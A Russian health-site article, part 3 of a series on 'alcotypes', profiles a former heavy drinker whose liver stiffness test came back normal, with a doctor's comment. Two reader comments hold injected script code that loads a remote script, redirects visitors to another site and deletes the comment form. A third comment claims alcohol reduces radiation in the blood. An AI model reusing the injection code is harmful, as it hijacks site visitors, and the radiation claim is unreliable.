Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чья печень в опасности: а...  >>  Чья печень в опасности: алкотипы. Часть 3
 
Обратная связь
 

Чья печень в опасности: алкотипы. Часть 3

Размер шрифта
13 ноября 2013 00:00
  • google_analytics: false
  • Нравится

Не секрет, что одним из главных врагов печени является алкоголь. А какие отношения с алкоголем у вас?

Чья печень в опасности: алкотипы. Часть 3

В Великобритании болезни печени занимают пятое место среди причин смерти; за последние 10 лет смертность от болезней печени увеличилась на 20%. Однако зачастую заболевания печени протекают бессимптомно, а симптомы появляются только на поздней стадии. Поэтому многие люди не подозревают о том, что у них тяжелое заболевание. «Большинство пациентов умирают от заболеваний печени уже после первой или второй госпитализации, поскольку не знают о своем заболевании. Во многих случаях заболевание оказывается настолько запущенным, что врачи практически бессильны», – поясняет гепатолог Мартин Принс из Манчестерской королевской лечебницы.

Конечной стадией заболеваний печени является цирроз – замещение паренхимы соединительной тканью. Если вовремя распознать причину заболевания, можно замедлить его прогрессирование и не допустить развития цирроза. В рамках исследования группа людей прошла ультразвуковое обследование, которое носит название эластография и позволяет оценить жесткость печени. Результат в диапазоне от 7 до 14 кПа свидетельствует о повреждении печени, а более 14 кПа – о циррозе.

В серии статей мы решили рассказать вам о реальных людях, имеющих разные отношения с алкоголем, и результатах их обследования.

Алкотип 3: алкоголь в прошлом

Павел Назаров, 33 года, преподаватель, проживает в городе Воронеж; женат, один ребенок. Рост 185 см, вес 96 кг, индекс массы тела 28 (избыточная масса тела).

Употребление алкоголя: 35 единиц алкоголя в неделю (одна единица = 10 мл).

Эластография: 3,1 кПа – норма.

Комментарий пациента: «Должен признаться, что в молодости я вел довольно разгульный образ жизни: уходил из дома вечером и возвращался только рано утром, пил почти каждый день, не зная меры. Спустя какое-то время я одумался и стал следить за своим здоровьем. Сейчас я бегаю 5-6 раз в неделю и правильно питаюсь, хотя периодически позволяю себе выпить. Но все же я стараюсь себя ограничивать, ведь моя жена беременна, и ей нельзя пить. Я был уверен, что бурная молодость оставит след на печени, но результаты обследования превзошли мои ожидания. Однако врач сказал, что если я не завяжу с алкоголем, рано или поздно печень выйдет из строя. Но я не могу рисковать, ведь у меня семья и новая работа».

Комментарий специалиста: «Несмотря на то, что у Павла была бурная молодость,  результаты обследования свидетельствуют об отсутствии поражения печени. У всех людей печень реагирует на алкоголь по-разному, что обусловлено генетическими причинами. Кроме того, клетки печени способны восстанавливаться. Регулярная физическая нагрузка и правильное питание позволяют сохранить здоровье печени и снижают риск развития ее заболеваний. Однако на данный момент Павел употребляет достаточно много алкоголя (норма для мужчин – не более 21 единицы в неделю), и если он не пересмотрит свои привычки, последствия могут быть достаточно плачевными».

Всю информацию о поддержании здоровья печени и лечении ее заболеваний читайте в материалах нашего специального проекта «Заботься о печени».

Узнайте все про другие алкотипы здесь:

Алкотип 1: алкоголь от случая к случаю,

Алкотип 2: ни дня без алкоголя,

Алкотип 4: алкоголь по выходным,

Алкотип 5: любитель домашнего вина,

Алкотип 6: трезвенник.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:54

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:53

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

3 - Гость

23 октября 2015 в 18:38

Цитировать   |   Пожаловаться

Здравствуйте! Спасибо за полезные советы. Врачи так критически относятся к употреблению алкоголя (это понятно) , но поддерживают Министерство обороны, которое производит и испытывает ядерное оружие в водной среде. 

Что лучше отравленная радиацией вода, которая из морей и океанов потом попадает в используемые человеком водные ресурсы или употребление алкоголя, которое частично снижает уровень радиации в крови?

С уважением

Статьи

       
Чья печень в опасности: алкотипы. Часть 5   Для кого алкоголь опасней всего   Чья печень в опасности: алкотипы. Часть 4   Что нельзя есть с больной печенью  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Что алкоголь делает с печенью
Как студенческая жизнь влияет на здоровье
Как понять, что вы пьете много?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.